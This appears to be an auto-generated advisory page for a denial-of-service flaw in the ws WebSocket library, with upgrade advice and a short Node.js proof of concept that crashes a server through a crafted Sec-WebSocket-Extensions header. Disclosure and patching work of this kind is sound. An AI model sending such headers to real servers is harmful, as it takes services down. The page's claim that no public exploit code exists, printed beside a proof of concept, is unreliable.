# GHSA-5v72-xg48-5rpm: Denial of Service in ws

> A remote attacker can crash the application by sending a specially crafted WebSocket extension header, requiring an upgrade to the ws library.

- **Severity:** Not scored
- **Exploited in the wild:** Not known
- **Login needed:** Not needed
- **Attackable:** Over the internet
- **Victim action needed:** Not needed
- **Fix available:** Yes
- **Published:** 4 Jun 2019

## What is GHSA-5v72-xg48-5rpm?

GHSA-5v72-xg48-5rpm is a denial of service vulnerability in ws, published on 4 Jun 2019. An attacker can exploit it over the internet without logging in, with no action from the victim.

### Official description

Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

## Proof of concept

```
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```

## Recommendation

Update to version 3.3.1 or later.

## Which versions are affected by GHSA-5v72-xg48-5rpm?

4 open source packages ship an affected version, including ws.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `ws` | npm | From 0.6.0 | 1.1.5 |
| `ws` | npm | From 0.6.0 | 1.1.5 |
| `ws` | npm | From 2.0.0 | 3.3.1 |
| `ws` | npm | From 2.0.0 | 3.3.1 |

## How do I fix GHSA-5v72-xg48-5rpm?

Upgrade ws to a fixed version for your release line: 1.1.5 or 3.3.1.

## Is GHSA-5v72-xg48-5rpm being exploited?

There is no known exploitation of GHSA-5v72-xg48-5rpm in the wild and no public exploit code.

## Fix prompt for AI coding agents

```text
Check this codebase for GHSA-5v72-xg48-5rpm and fix it if it is affected.

What it is: GHSA-5v72-xg48-5rpm is a denial of service vulnerability in ws, published on 4 Jun 2019. An attacker can exploit it over the internet without logging in, with no action from the victim.
Exploitation: There is no known exploitation of GHSA-5v72-xg48-5rpm in the wild and no public exploit code.

Affected packages and fixed versions:
- ws (npm): affected from 0.6.0; fixed in 1.1.5
- ws (npm): affected from 0.6.0; fixed in 1.1.5
- ws (npm): affected from 2.0.0; fixed in 3.3.1
- ws (npm): affected from 2.0.0; fixed in 3.3.1

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/ (Markdown: https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/index.md)
```

## Sources

- OSV: https://osv.dev/vulnerability/GHSA-5v72-xg48-5rpm

---
From sbomify Insights: https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/
Summaries are generated and may contain mistakes; the official description above is the record.
